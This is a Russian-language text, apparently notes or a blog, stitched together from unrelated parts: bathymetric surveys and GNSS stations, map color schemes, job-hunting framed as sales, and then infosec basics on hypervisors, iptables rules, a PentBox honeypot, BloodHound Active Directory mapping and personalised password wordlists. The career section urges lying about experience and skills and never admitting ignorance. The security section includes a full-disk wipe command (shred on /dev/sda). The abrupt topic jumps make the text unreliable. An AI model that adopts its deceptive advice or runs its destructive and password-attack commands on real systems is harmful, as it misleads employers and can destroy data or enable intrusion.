Другой способ посмотреть под воду это батиметрическая съемка. Она фокусируется на подводных особенностях, а не на наземной топографии. Батиметрическая съемка включает измерение и картографирование глубины, контуров и особенностей океанов, морей, озер и рек. Она необходима для понимания подводной топографии, морской навигации и прибрежного инжиниринга. Визуализация будет в формате контурных карт. Они используются для представления батиметрических данных. На этих картах отображаются линии, соединяющие точки одинаковой высоты (глубины в случае батиметрии), что обеспечивает визуальное представление подводных рельефных особенностей, таких как впадины, хребты и долины.

Переходим к тяжелой артиллерии. CORS (непрерывно работающие опорные станции). CORS — это сеть постоянно установленных опорных станций, которые в режиме реального времени предоставляют приемникам поправки GNSS (глобальной навигационной спутниковой системы). Эти поправки позволяют осуществлять точное позиционирование и навигацию за счет компенсации ошибок, вызванных такими факторами, как атмосферные условия и отклонения орбиты спутников. Непрерывная запись данных обычно идет с интервалом менее 30 секунд.

Мобильные платформы, такие как смартфоны и планшеты, обычно не используются для непрерывного мониторинга атмосферных явлений или долгосрочного мониторинга наземных объектов. Они чаще используются для сбора личных или локальных данных и не так широко применяются для целей крупномасштабного мониторинга. Космические платформы, такие как спутники, используются для непрерывного мониторинга атмосферных явлений и долгосрочного мониторинга земных объектов. И наземные платформы специально разработаны для непрерывного и локализованного мониторинга.

Цвета

В картографии используется три основных типа цветовых схем для визуализации данных поверх базового слоя:
1) Последовательные схемы
Используются для упорядоченных или числовых данных, которые прогрессируют от низких к высоким значениям. Эти палитры варьируются по яркости — от светлого к темному (или наоборот) — что позволяет легко отслеживать тенденции.

2) Расхождающиеся схемы
Идеально подходят для выделения значений выше и ниже центральной средней точки (например, среднего значения, нуля). Средний цвет обозначает эталонное значение, а контрастные оттенки на обоих концах — высокие и низкие крайние значения. Комбинируя несколько таких цветовых схем, можно получить отличные цвета для на тримапа.

3) Качественные схемы
Лучше всего подходят для категориальных данных, где каждая категория представлена отдельным оттенком с одинаковой яркостью и насыщенностью — идеально подходят для различения регионов, типов землепользования или административных границ. Скажем, есть 5 параметров и они меняются с течением времени, выбирайте control chart и контрастные цвета. Или нужна просто легенда для маримекко? Ровно такая схема сработает.

В любых продажах главное это ваше отношение. Отношение играет ключевую роль. Нейтральное или негативное отношение это заявка на провал. Думаете, что ваш продукт это фигня? Ничего и не продадите. Думаете, что не достойны работать в крупной корпорации? Хорошо, никогда не будете. Отношение формируется еще до первого звонка/письма/диалога с потенциальными клиентами. Всегда задавайте себе вопрос перед отправкой сопроводительного письма: я сейчас тот человек, которого наймут? Ведь вы откликаетесь на вакансию не для себя, а с целью закрыть боль на стороне компании, им же нужен лучший специалист. Иначе не было бы открытой вакансии.

Отношение. Не проблемы, а возможности. В вашей речи только позитивный вайб. У вас всегда должен быть план на каждый час в вашем календаре, не позволяйте себе плыть по течению. Пусто в календаре? Позовите случайного человека поиграть в теннис, помогите соседу починить машину. Пока вы двигаетесь, с вас слетает весь негатив. Вставайте раньше всех, уходите позже всех. Те, кто уходят раньше, не обладают нужной мотивацией и отношением к занятости. Ваши дети и жена дома должны увидеть вас победителем, а не уставшим. И всегда действуйте. Не ждите, действуйте. Звоните, пишите, орите, меняйте. Используйте Gmass для массовой рассылки. Люди видят действия, а не ваши эмоции.

Всегда будьте заняты. Никогда не делитесь плохим, никому не нужен негатив. И уж тем более не нужно, чтобы люди ассоциировали негатив в сами. Читайте много книг. Если вы не можете осилить интересную книгу, то как вы прочитаете и поймете условия контракта?

Найдите людей, кто будет вас толкать вперед. Коуч, жена, начальник, кто угодно. Кто-то должен пушить вас на новый уровень. Это те люди, кто будут верить в вас больше, чем вы сами. Ищите сложности. Чем сложнее купить квартиру, тем легче и прибыльнее ее продать в дальнейщем.

Раз вы идете в найм, то вы идете обслуживать клиента. Искренне и с позитивом следовать за лидером. То, что вы старше, не играет никакой роли. C этой точки начинается процесс продажи. Позитивность сохраняется за счет формирования позитивного окружения: не читайте посты про ужасы найма. Открываете новости? Зря, вы не знаете, какой там будет контент. Контент должен быть предсказуемо-позитивный. Смотрите успешных людей, формируйте соответствующее окружение. Работайте на цель, и не жалуйтесь. Спина болит? Не можете найти партнера? Так звучат дети. Если вам есть, на что жаловаться, значит вы не контролируете определенный аспект своей жизни. Никто ни в чем не виноват, кроме вас. Ни экономика, ни мировой порядок, ни супруга, начальник, и даже не удача. Во всех неудачах виноваты в вашей жизни вы сами. Поэтому не жалуемся, все, кроме здоровья, можно изменить. Поддерживаем в себе позитив, это энергия из энтузиазма. Мозг выбирает искать минусы, это отнимает меньше энергии. Все вокруг ищут в вас недостатки, но ваша задача это искать в себе хорошее. Вопреки всему. Одевайтесь позитивно, будьте нелогичны в плане ожиданий от себя. Ставьте высокую планку. Делайте больше, чем ожидалось. Делайте сложное в самом начале. Работайте на максимальных оборотах.

СПИН

Спин продажи первым шагом подразумевают выяснить ценность. Перед собеседованием лучше заранее выяснить, какие потребности у компании. Описание вакансии это самая база, но более глубинно: чего хочет конкретный HR. Больше открытых вопросов. Повышайте доверие цифрами: не «растил финансовые показатели и закрывал OKR», укажите цифры, громкие фразы, мощные не притянутые за уши достижения.

Ваши возможности по продажа напрямую зависят от вашей базы клиентов. Расширяйте сеть контактов. В идеале, делайте это сильно заранее. Когда вам понадобится искать работу, вы окажетесь в ситуации, что не можете связаться с нужным человеком даже за деньги. Если вы были у человека в друзьях давно, и даже успели немного пообщаться, то личные сообщения будут восприниматься как просьба о помощи, а не продажа.

Компания ищет сотрудника. Вам нужно знать, почему они ищут сотрудника, зачем, почему именно сейчас? Не нужно играть в детектива, все эти вопросы можно спросить напрямую у нанимающей стороны. И скорее всего вы не получите детального ответа, и это ваш косяк. Будьте назойливыми, настаивайте, пока не получите ответ. Но никогда не спрашивайте ненужных вопросов в начале диалога, и уж тем более неуместных. Например: ну что, меня наймут? Какой у вас бюджет на вакансию? Денежная планка не является началом переговорного процесса.

Если ваш настрой это найти хоть какую-то работу, то вы будете искать долго и получите минимальный оклад. Ваше отношение и настрой должны быть максимально позитивными и амбициозными, не взирая на все обстоятельства. Свое отношение легко показать через слова: я чертовски рад, я к вам иду как раз ради таких задач, вы правы, я согласен с вами, отличная идея, вы уже мой самый любимый руководитель. Делайте людей счастливыми, оставайтесь позитивными. И делайте это быстро, большие деньги и большая скорость это синонимы.

При первом звонке, главное создать впечатление доброжелательности. И это определяет, кто контролирует и ведет встречу. Вы приветствуете людей с энтузиазмом, заранее заучиваете имена всех участников встречи. Улыбайтесь. Никогда не спорьте, если только вы заранее не знаете, что в культуре компании это вечные споры. Подумайте об окружении, вашей одежде, что вы расположили на фоне. Никогда не признавайте, что вы чего-то не знаете. Вы должны вызывать доверие. Естественное желание людей при первой встрече с другим человеком это оценить, насколько человек безопасен. Безопасность идет от общих интересов. Вы пытаетесь продать себя как проактивного специалиста, а нанимающий менеджер ищет безмолвного исполнителя? Тут явно есть конфликт интересов, и не в вашу пользу. Это ваша задача показать общие интересы: «у нас скучные таски», «я знаю, но для меня это будут самые интересные таски в мире».

Не говорите «если вы меня наймете», а используйте оборот речи «когда я присоединюсь к команде». Не ваш дизайн-департамент, а мой дизайн-департамент. Описывайте, в чем плюсы любого вашего достижения, а не просто констатируйте цифры из резюме. Закончили крутой универ? Опишите, что ваше образование даст компании. И все это с энтузиазмом.

В ходе переговоров НИ-КОГ-ДА не уходите в оборонительную позицию. Ваше тестовое смешивают с навозом? Прекрасно, участвуйте в этом, а не оправдывайтесь. Критикуют опыт? Накиньте побольше, идите в диалог. Вы должны продать себя на $6,000, если хотите зп в $3,000. Продавайте на бОльшую сумму, чем претендуете. Убедите себя, что вы стоите минимум миллион в месяц. В интернете полно сервисов для получения среза реальных зарплат, например teamblind, Levels (FAANG), Indeed, Glassdoor Salary.

Если вас спрашивают на собеседовании, куда у вас больше уклон: Ui и UX, то ожидается ответ именно на этот вопрос. Выбор одного из двух, а не «я хорош во всем и это неразделимые понятия». Рассуждения тоже не всегда ок. Когда вас спрашивают, что вы предпочитаете, то ожидается ответ именно про ваши предпочтения. Так HR сможет поставить/не поставить галочку про ваш фокус во время скрининга. Продажи это закрытие потребности, заполнение пустоты. Аналогично про вопросы о сложных решениях. Речь не об сложности принятия решения лично вами, а насколько это было важным решением в рамках роста компании. Условно, что-то не работало, но было важно для бизнеса, и после вашего решения заработало. Сложное решение это решение, которое нельзя откатить. Например, внедрить в телефон NFС. Сразу встает вопрос бюджета: чем NFC датчик дешевле, тем меньше данных он может передать. Такие решения принимаются быстро, со скоростью мира, или быстрее.

Другой пример сложного решения. Настало время сократить штат call-центра. Но менеджеры не хотят принимать изменения, и заявили что скорее уволятся, чем примут любые изменения. Тут правильный путь это вводить изменения постепенно, но сроки горят. Вот это сложная ситуация с последствиями.

Помним, что нравиться всем это невыполнимая задача. Кому-то подавай кейсы от джунов по росту компании из стартапа в многомиллиардную олигополию. Другим нужны стагнирующие безамбициозный высококвалифицированные рабочие лошадки. Зная это, вам будет легче продать свою кандидатуру. От этого начинается ваша презентация кейса, которая продаст вас клиенту. Вы всегда должны показывать правильный продукт правильной аудитории. В ключевых моментах презентации, явно просите полное внимание вашего клиента. Контролируйте внимание клиента словами: обратите внимание на это, вы просто должны это увидеть. Деньги следуют за вниманием, вы должны впечатлить и управлять вниманием. И спросите в конце: увидели ли вы достаточно, чтобы принять решение?

Резюме

Ваше резюме это не история вашей проф. деятельности. Резюме это скрипт продажи клиенту, и резюме подгоняется под каждую вакансию и конкретные ATS-системы. Если в вакансии указано UI/UX Designer, то ваше резюме с заголовком Total B2B Product Designer сразу летит в мусорку. Если в требованиях указан Photoshop, то вы не готовитесь отстаивать Affinity Designer как лучший инструмент, а дописываете Photoshop в свое резюме. Если в вакансии не упоминаются навыки 3D, то удалите их из резюме. При высокой конкуренции, требуется 100% совпадение, а не «ну вроде должен справиться с работой». Некоторые ATS настроены на автоматический отказ, если есть совпадение по каким-то ключевым словам, и это слово может быть «Sketch», «Master» или «iGaming». Если следовать GDPR, статья 22, то запрещено отказывать кандидатам через полностью автоматизированную систему. Поэтому «неподходящие» резюме падают в папку, куда HR не доходит. Чтобы ваше резюме не попало в эту самую папку, оно должно соответствовать вакансии на все 100%. ATS это не AI, оно просто сравнивает слова в вакансии и в резюме, далее выдает топ резюме рекрутеру.

Подготавливать CV под каждую конкретную вакансию сложно, используйте нейронки или сервисы вроде www.myperfectresume.com/. Вам все равно не учесть всех нюансов, ведь HR используют целый зоопарк инструментов — bullhorn, iCIMS, job diva, success factors, workday, Kenexa/BrassRing. Например, Workday размещает кандидатов без резидентства в отдельной папке, с этим ничего не поделать. Вы всегда сможете уже с нанимающим менеджером допродать своих навыков, но HR это не интересно. У них — чеклист.

Если на собеседовании много людей, поймите на берегу роли: кто является владельцем процесса (принимает решение, важен найм классного специалист) и кто самый громкий голос (лидер мнения в команде).

Последнее место работы в вашем CV должно быть аналогично вакансии, на которую вы откликаетесь. Только так вы сможете конкурировать. Что такое конкуренция: вакансия опубликована 10 минут назад, на нее уже откликнулось 50 человек. За неделю будет 1000+ откликов. Вот пара примеров:

Стандартная структура для резюме: контактная информация > опыт работы > образование > личные проекты > ключевые навыки тегами. Опыт работы лучше описывать так:

• кратко о том, чем занимались в этой должности
• какие лично ваши достижения можно выделить (если вы только участвовали в проекте, но не привнесли личный вклад, то уберите это из резюме)
• какие основные технологии использовал (тоже тегами). Про достижения важно подчеркнуть, что они должны быть адекватны вашей роли. Редко кто ждет великих достижений от джуна с частичной занятостью.

Для каждого рынка свой шаблон: европасс для ЕС, HH для РФ. Большие известные компании в резюме всегда лучше, чем мелкие и неизвестные. Шансы продать себя на скрининге чуть выше, и известные бренды в резюме будут «тянуть» в вашу орбиту другие известные бренды в дальнейщем.

Работать и учиться одновременно в РФ — норма, а вот для штатов этот нонсенс. Могут понять только частичную занятость на последних курсах. Дело в том, что в штатах образование дорогое и каждый год стоит гору денег. Многие берут кредит на образование, и хотят взять от образования всё. Также, они обязаны отучиться определенное кол-во кредитных часов, прогуливать не выйдет.

И думайте о том, как выглядит ваша кандидатура на стороне HR. Как HR видит ваш отзыв в LinkedIn:

И главный нюанс. Если вы все делаете правильно, то успеха не будет. Потому что каждый участник рынка всё делает правильно. Все прочитают эту статью, посмотрят уроки на ютубе, получат фидбек по резюме от одних и тех же людей. У всех одинаковые скрипты продаж, все читали одинаковые книги и советы. Поэтому вы не ждёте, когда к вам придет клиент. Вы сами идете к клиенту и предлагаете товар. Находите email людей, пишите им в социальных сетях. Напоминаете о себе каждые 5-10 дней. Ожидайте, что вас наймут после 1 000 релевантных откликов. Когда вы откликаетесь на 10 вакансий в день, то за 3 месяца скорее всего получите оффер. Если у вас есть деньги и нет времени, то автоматизируйте подачу на вакансии с помощью https://www.wobo.ai/ или аналогов. И даже если вам суждено завалить интервью, хотя бы сделайте это потому что перестарались, а не недотянули. Делайте все так, словно ваша жизнь зависит от этой задачи. Если вы не можете ответить на какой-то вопрос, старайтесь сменить тему на зону вашей экспертизы.

Посредники

Кадровые агентства могут помочь. На рынке СНГ есть некое недоверие к внешним кадровым агентствам, но на международном рынке они очень помогают. Дело в том, что внутренние HR компаний очень ленивые, и они банально не смотрят 1000 откликов в день. Они ждут, когда внешнее агентство принесет им хороших резюме, или знакомых приведет своего друга. Внешние HR-ы получают тысячи откликов в день на разные позиции, отсматривают те, что прошли автофильтрацию, и открывают первые 5-10. Созваниваются с вами, проверяют базовую адекватность, и отправляют резюме напрямую тимлидам. Простая математика: вы один из 500 откликнувшихся, 500 / 10 = 50, то есть ваш шанс быть просмотренным 2%. Если вы откликнулись на 100 вакансий, то почти наверняка у вас будет 1 просмотр. Из 10 просмотров должен быть один оффер, отсюда и цифра в 1000 откликов.

Международность

Какой бы вы не были крутой лид из топовых СНГ-банков, на международном рынке всегда будет кто-то лучше вас: дешевле, больше опыта, знает больше языков, не нуждается в визе и страховке, только вчера уволен из MAANG, есть три паспорта, уже 10 лет живет в Париже с закрытой ипатекой. Поэтому делать ставку только на hard-скилы это гиблое дело.

Но секрет в том, что быть лучшим не является основным критерием. Hard-скилы больше не продают. Есть много причин, почему вас могут не нанять: ищут сотрудников только из MAANG, или владельцев определенных паспортов. Могут нанимать только знакомых, или HR в принципе саботирует процесс найма.

Поэтому важно писать напрямую ЛПРам, их контакты можно купить в сервисах типа Datanyze. Нет смысла продавать тому, кто не имеет право принимать решение. Ищите главного менеджера, или своего потенциального будущего босса. Подружитесь с ним, создайте чувство срочности решения какой-то проблемы, покажите аналитические данные, как конкуренты уже занимают рынок. Предложить цель и план достижения цели с вашим участием. И ложка дёгтя: почти всегда, вас отправят обратно на этап HR для формального процесса, но вы хотя бы пробьетесь через фильтры ATM. Заложите основу для продажи своего потенциала, и сможете поговорить о своих прошлых заслугах. Но не нужно концентрироваться на прошлом: успехи в прошлом не гарантируют будущих побед.

Чем меньше у вашего клиента свободного времени, тем больше у него денег и тем более серьезные решения он может принимать. А значит, это ЛПР. Если мы говорим об оффлайновом мире, то на собеседование вы одеваетесь премиально. Комфортно для клиента, и профессионально. Ведите себя как победитель, походка чемпиона, огонь в глазах. Смотрите на людей прямо, с улыбкой. Улыбка сохраняется, даже когда вам отказывают или задают сложный вопрос. А если вы отказываете, то делаете это не ультимативными «нет и точка», а «безусловно, оффер у вас классный, но нужно изменить…», и с улыбкой. Это должна быть ваша привычка: улыбаться как младенец. Младенец не может сделать вообще ничего, шумит, шалит, но все в восторге от его улыбки. Вы не правы? Улыбайтесь, почти все успешные люди не правы во всем. Вы хоть раз видели начальника, который регулярно принимает правильные решения? Таких не бывает.

Ответы на вопросы:

У вас должны быть готовы ответы на все возможные вопросы. Отработаны обработки на любые возражения. Козыри в рукаве. Вот несколько подсказок:

1. Какое сложное решение пришлось недавно принять? — то, которое нельзя откатить.
2. Какие социальные сети вы используете, и почему?
3. Как ставите приоритет на задачи? — от вас ожидают некий фреймворк, а не «на глазок».
4. Проект, которым гордитесь?
5. Как решаете конфликты в команде? — одна из моделей, например ADKAR, McKinsey 7S, Lean Change Management, PDCA, SBI-G feedback framework.
6. Как вы себя чувствуете в быстрой смене контекста?
7. Расскажите про недавнюю сложную рабочую ситуацию в деталях. Отвечаем по STAR (ситуация, задача, действие и результат)
8. Расскажите про ситуацию, когда вы были не согласны в менеджером.

Сложная ситуация это почти всегда решение по STAR:
S — ситуация: объединение несколько компаний в единый холдинг;
T — задача: перевести несколько компаний на новую дизайн-систему;
A — действие: создание единого департамента дизайна на все компании, сбор всех дизайн-специалистов под руководство одного лидера;
R — результат: единый look and feel для обновленной линейки продуктов, оптимизация распределения ресурсов;

Для отработки прохождения интервью, попробуйте finalroundai.

Конфликты

Конфликты неизбежны. Вы пытаетесь навязать услугу, продать себя, идею, и не всем это понравится. Простой пример: вы принесли фичу команде разработки, разработка решила саботировать фичу оценкой в 900 часов. Это конфликт. Тут есть неприятный нюанс: у вас нет возможности уйти от сделки. У разработчиков здесь более сильная переговорная позиция. Если вы обязаны прийти к соглашению, а ваш оппонент нет, то вы всегда в проигрышном положении. Надо заранее иметь аргументы: сейчас поработаем по максимуму, надо сдать за 3 недели, зато в следующем месяце будет лайтово.

Ключевое в решение конфликтов это приоритеты. Например, у нас есть 2 задачи, одна на улучшение функционала, а вторая на новый функционал. Улучшение ускорит время заполнения заявки в системе закупки, а новый функционал позволит работать с новым типом контрагентов. Тут надо понять, что сэкономит больше денег компании, это мы выясним с менеджером. Новые контрагенты могут решить больше проблем, чем ускорение работы с заявками. Значит, без прочих вводных берем в работу новый функционал с высоким приоритетом. Наиболее значимое изменение это всегда самый приоритет.

Компании постоянно подвергаются атакам. С каждым годом DDoS-атаки усиливаются, а вектора атак становятся все более изощренные. Например, возможна атака вашей компании через подрядчика, особенно во время праздников. Можно сказать, что в этом случае подрядчик несет юридическую ответственность. Но что такое киберинцидент де-юро? Есть ли описание понятия киберинцидента в договоре? И даже если и есть, вот подрядчик под DDoS атакой и у него лег сайтик, в этом случае нам, как заказчику, это вообще важно? Скорее всего нет. В мире инфобеза все всегда очень взаимосвязано, поэтому давайте поговорим о базовых методах защиты и проверки инфраструктуры компании, чтобы избежать взломов и юридических последствий.

Итак, умные дяди провели сайзинг железа, закупили серверов и теперь в вашей организации есть набор устройств. На них стоит хостовая операционная система. Это та OS, которая стоит непосредственно на железе: установили на комп Windows или Astra, и на этой системе работает железо. В противовес, существует гостевая операционная система как виртуальная машина. Также есть VMM.

Виртуализация: на компе стоит Ubuntu, у компа есть клавиатура, мышь, жесткий диск с OS, много прочих микросхемок. OS общается с железом через драйвер под Ubuntu, который переводит команды с языка OS на язык железа. Из функций в нолики и единички. Мышки от разных производителей могут иметь разные синтаксисы, и поэтому у всех устройств свои драйверы. И если работают разные OS через виртуализацию, им тоже надо как-то получать доступ к железу. Вот для этого и используется гипервизор. Многие компании используют виртуализацию и виртуалку как основную рабочую систему, и это хорошая практика в точки зрения ИБ. Примеры популярных гипервизоров QEMU и Bochs. Тут важно знать, что многие злоумышленники пишут свое ПО с проверками, запущен ли вредонос в виртуалке или в реальной системе. Очередная гонка вооружений.

OS делает много запросов к оборудованию, и некоторые запросы требуют особых привилегий для исполнения. Архитектура x86 использует 0-3 уровни привилегий, где 0 самый крутой уровень. Но в мире безопасности мы часто упрощаем до двух уровней: 0 как уровень ядра и 3 как уровень пользователя.

Паравиртуализация это техника виртуализации, которая позволяет гостевой OS понять, что она живет в виртуальной машине и есть специальный интерфейс для обращения к хостовой OS за системными функциями. Гостевая система знает, что она без уровня доступа 0 и ведет себя соответствующе. Примеры — XEN, UML. Но для паравиртуализации надо переписывать OS, не все вендоры на это готовы. Windows 8 это поддержало, но у MS есть ресурсы для таких доработок.

Аппаратная виртуализация это отход от концепции костылей на уровне софта на уровень костылей на уровне железа. Мримеры это Intel-VT, AMD-V. Меняется архитектура процессора для прямого доступа из гостевых OS.

Очень популярный формат работы через гипервизоры это автономные гипервизоры, работают на голом железе и не требуют никаких прослоек, гипервизор сам по себе OS. Если вы работали на удаленке, то вероятно сталкивались VDI, так вот это как раз оно самое. Высокая производительность и нельзя скомпрометировать прослойку, ведь ее попросту нету. Из минусов, урезанность OS. Реализация через Hyper-V для windows, VMware ESXI. Как альтернатива, это хостовые гипервизоры, выполняют роль посредника. Гипервизор KVM это отдельный процесс в системе. Как вы уже поняли, в любой крупной компании будет гипервизор с неким кол-вом машин, которые закреплены на вами. Внутри гипервизора живут виртуальные машины.

Виртуалки ≠ контейнеры. Контейнеризация и виртуализация решают разные задачи. Раньше виртуалки выполняли роль контейнеров, но контейнеры решают более ресурсоемкие задачи. Контейнер знает, что он контейнер, и не может получить доступ к другим контейнерам (но их можно подружить). Docker это самое популярное ПО для контейнеризации, он заточен на один контейнер = одно приложение, и соответствущий небольшой вес. Контейнер это обрезанная OS. И помним, что Docker про Linux, настраивать на нем винду можно, но больно. Еще одно отличие: виртуальная машина может работать и сотни дней, контейнеры живут до ближайшего обновления кода. Их легко убить и восстановить, в этом еще одно преимущество для безопасности. И виртуальная машина обычно в формате .iso, .vmdk, .vdi, контейнеры же это готовые образы или собираются по инструкции в конфигурации. Найти готовые образы под Docker можно тут. Когда у вас 1000 контейнеров, то уже нужно идти в оркестрацию (Kubernetes, Docker Swarm, Nomad).

Если же говорить про решения под малые организации и ИП, то вы по прежнему будете работать с сервером (VPS). VPS это выделенная под нас виртуалка. В случае аренды VPS, безопасность обеспечивает хостером, а вы получаете доступ по SSH (ключик и/или пароль). Об арендованном сервере частично заботится провайдер, и на ваш VPS будет установлен агент типа zabbix. Важно заранее уточнить у провайдера про доступ к портам, ведь нам может понадобиться порт под почту, 80-ый порт для получения сертификатов. Возможно арендовать и неуправляемый VPS, где вы сами решаете все проблемы с памятью, производительностью и т.п.

Итак, вы арендовали VPS и хотите его использовать как ловушку для злоумышленника. Для этого мы осознанно делаем наш сервис уязвимым. Злоумышленник попадает на фейковый сервер, радуется, выполняет команды, скачивает «secret documents.txt», а мы ведем аудит. Так мы можем узнать source IP. Предположим, что злоумышленник поставил своё ПО на наш сервер и началась коммуникация с ботнет сервером (robot + network). Вот адрес ботнет сервера для нас будет IoC.

Скорее всего у вас будет SIEM, где syslog отправляет в SIEM логи с нормализацией и строится корреляция. Данные будут собираться либо по syslog, либо SNMP, либо Package Capture. Если нету денег на дорогой SIEM и мы по прежнему ИП, то нас вполне устроит и fail2ban. Он позволяет настраивать правила корреляции, например, если было 10 попыток входа с определенного адреса, то забанить этот адрес на n-времени. А создание простой ловушки с помощью PentBox выглядит так:

git clone https://github.com/technicaldada/pentbox
cd pentbox
tar -zxvf pentbox.tar.gz
cd pentbox-1.8
./pentbox.rb
2
3

Firewall

Firewall ограничивает сетевые подключения. Тот же cloudflare тоже играет роль Firewall и защищает от DDoS, или Firewall может быть в виде программно-аппаратного комплекса. Но его важно правильно настроить, ничто не работает из коробки, что бы вам не говорили продавцы. В Linux встроен netfilter (iptables). iptables это утилита для управления IP-пакетиками. Либо более новая nftables. Внутри есть несколько этапов фильтрации трафика:

• Prerouting для всех пакетов, которые прилетают на сетевой интерфейс.
• Input — правила применяются пакетом для самого хоста, или для локального процесса. input отвечает за входящий трафик к маршрутизатору, и чтобы запретить некий трафик через ваш маршрутизатор, то именно тут прописываем нежелательные адреса.
• Forward — правила, которые срабатывают, когда наш хост играет роль роутера. Грубо говоря, отвечает за трафик, проходящий через маршрутизатор.
• Output — хост сам сгенерировал пакеты и отправляет пакеты во вне. Это тот трафик, который генерируется маршрутизатором во вне.
• Postrouting — правила применяются к любые пакетам, которые долждны покинуть сетевой интерфейс. Это базовая цепочка.

Есть разные таблицы, таблица NAT перенаправляет пакеты и меняет адреса в поле назначения/отправителя. iptables -t nat -L,

iptables позволяет закрыть / хамаскировать неиспользуемые порты (Port knocking), разграничить доступ по IP, предотвратить утечку трафика или IP-адреса (killswitch).

Для работы iptables требуется root-доступ, повышаемся командой sudo -s. Командой iptables -L, что-то более практичное это команда iptables -A INPUT -p icmp --icmp-type echo-request -j DROP, и создадим вторую команду iptables -A INPUT -p tcp -j DROP. Получаем такие правила:

target     prot opt source               destination         
DROP       icmp --  anywhere             anywhere             icmp echo-request
DROP       tcp  --  anywhere             anywhere           

Очень популярно открыть определенный порт. Предположим, это порт 22. Тогда командой перекрываем трафик sudo iptables -A INPUT -p tcp --dport 22 -j ACCEPT.

Правила записаны, теперь когда пакет прилетает по цепочке input, и это icmp или tcp трафик, то пакеты будут дропаться без оповещения отправителя. Для блокировки некого порта, команда iptables -A INPUT -p tcp --dport 80 -j DROP. Послушать активные порты можно командой netstat -tulpn | grep LISTEN

И заблокировать доступ по домену: iptables -A OUTPUT -p tcp -d pfr.ru -j REJECT.

Маппинг Active Directory это процесс извлечения информации из среды Active Directory, включающий перечисление пользователей, разрешений и привилегий, групп, компьютеров и т. д. в качестве предварительного шага для обнаружения уязвимостей и путей атаки.

Разведка

Мы будем использовать Bloodhound для увеличения уровня привилегий. BloodHound это инструмент с открытым исходным кодом, разработанный harmj0y, CptJesus и _wald0, который использует теорию графов для выявления скрытых и часто непреднамеренных связей в среде Active Directory или Azure. В любом пентесте задействован Bloodhound, т.к. Active Directory уже более 25 лет и получение прав это основа любой атаки. Злоумышленники могут использовать BloodHound для легкого выявления очень сложных путей атак, которые иначе невозможно было бы быстро определить. Мы, как защитники, можем использовать BloodHound для выявления и устранения путей атак. Как «синие», так и «красные» команды используют BloodHound для более глубокого понимания отношений привилегий в среде Active Directory или Azure.

Bloodhound собирает данные из инфраструктуры AD с помощью исполняемого файла C# или сценария PowerShell. Пользователю не требуется никаких особых привилегий, кроме прав пользователя домена. Собранные данные помещаются в базу данных Neo4j (система управления базами данных на основе графов, используемая для отображения сложных взаимосвязей в виде графов).

Затем с помощью специальных запросов можно определить возможные пути атаки в относительно удобном для просмотра интерфейсе. Граф помогает пользователю выявить множество взаимосвязей, таких как:

• Пользователи в определенных бизнес-группах с особыми привилегиями, превышающими требуемые для привилегированного объекта (пользователя/компьютера). Например, группа HR с привилегиями RDP на контроллере домена.
• Кратчайший путь к администратору домена с такими же привилегиями.
• Пользователи с повышенными привилегиями (за пределами пользователей в группе администраторов домена).

Дополнительно, графы Maltego всегда выглядят эффектно в отчете.

Исследование своей сети

Мы получили все официальные разрешения на тест инфраструктуры. Упражняться мы будем в Kali VM. Инструкция по установке BloodHound для поиска уязвимостей. Для начала обновление apt-источников:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

Run apt-get update — sudo apt-get update. Теперь neo4j будет автоматически брать информацию из этого репозитория, когда ему потребуется установить Java в рамках процесса установки. И устанавливаем Neo4j.

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add - 

sudo -i   
echo 'deb https://debian.neo4j.com stable 4.0' > /etc/apt/sources.list.d/neo4j.list

sudo apt-get update
sudo apt-get install neo4j -y

Запускаем и устанавливаем bloodhood:

cd /usr/bin
sudo ./neo4j console
sudo apt install bloodhound -y

В браузере переходим по адресу https://localhost:7474/

Доступ

Когда выбрано «слабое звено» в цепи AD, настало время для более точечного теста на проникновение. На этом этапе нужно обзавестись набором словарей. Для генерации словарей есть множество инструментов, например mentalist или bopscrk. Для создания персонального словаря попробуйте команду bopscrk -i. Для работы с ним рекомендуется заранее провести ресерч про человека, его интересны и личные данные. На основе этих данных будут сформирован персонализированный словарь, но помним про закон и не используем никакие личные данные людей.

Если мы в сети, то в консоли можно запустить nethogs, он читает трафик через libpcap и мапит на /proc. Если задача посмотреть, сколько трафика кушается в данный момент, то nethogs легкий и быстрый вариант. Как это выглядит:

sudo apt install nethogs
sudo nethogs eth0

Второй полезный инструмент iftop, который позволит посмотреть, какое приложение куда лезет. И понять, какие приложения являются нелегитимными.

sudo apt install iftop
sudo iftop -i eth0

Всеми этими консольными приложениями удобно пользоваться с помощью apt install screen. Со screen -S вы будете переключаться между терминалами, а процессы будут работать в фоне. Напомню, что всегда можно посмотреть репозиторий таких инструментов командой apt policy iftop. А если нам стало важно логировать сетевую активность для отчета по безопасности, то это можно с помощью Netstat, Burp, Wireshark. Firejail с флагом --trace, --tracelog, --debug. Из того-же Wireshark удобно сохранить .pcap, и закинуть его в zeek. Помним, что вся ваша работа бесполезна, если вы не донесли до бизнеса через отчеты/коммуникацию реальную ситуацию и опасность непринятия важных решений.

Для наблюдения в реальном времени можно использовать prometheus. Чтобы установить prometheus, в Docker кидаемся командой sudo docker run -d -p 9090:9090 prom/prometheus , и зайти на http://localhost:9090. Prometeus работает на :9090. Создайте любую джобу, например на мониторинг самого prometheus. Метрики будут крутиться по адресу http://localhost:9090/metrics

Увидели, что есть подозрительные активности на корпоративно сервере? Данные должны быть в бекапе. Самое главное, это хранить резервные копии всего. brbackup наше все. А важные файлы лучше удалить, пока их не забрал злоумышленник со скомпрометированного сервера. Linux может безопасно удалить файл, многие использую rm filename.txt, но команда shred -u -n 20 более надежная. Или быстрое решение для всей файловой системы это srm -v. Или shred -v -z -n 3 /dev/sda для полной перезаписи диска. Это полностью убивает OS. Из более экстремальных способов можно назвать ShredOS. Если вам нужно избавиться от списанного корпоративного оборудования безопасно, то ShredOS хороший выбор.

Для создания бекапов, для начала надо спросить вопросы:

• что мы копируем?
• как часто мы копируем?
• сколько копии хранятся?
• какими инструментами делать бекапы?
• сможем ли мы воспользоваться бекапом? У меня был неприятный опыт с PostgreSQL

И далее выбираем инструмент. В Linux есть tar, но он умеет в бекам только без сжатия. Если сжатие необходимо, то rsync. Можно поиграться с древними dd и cpio.

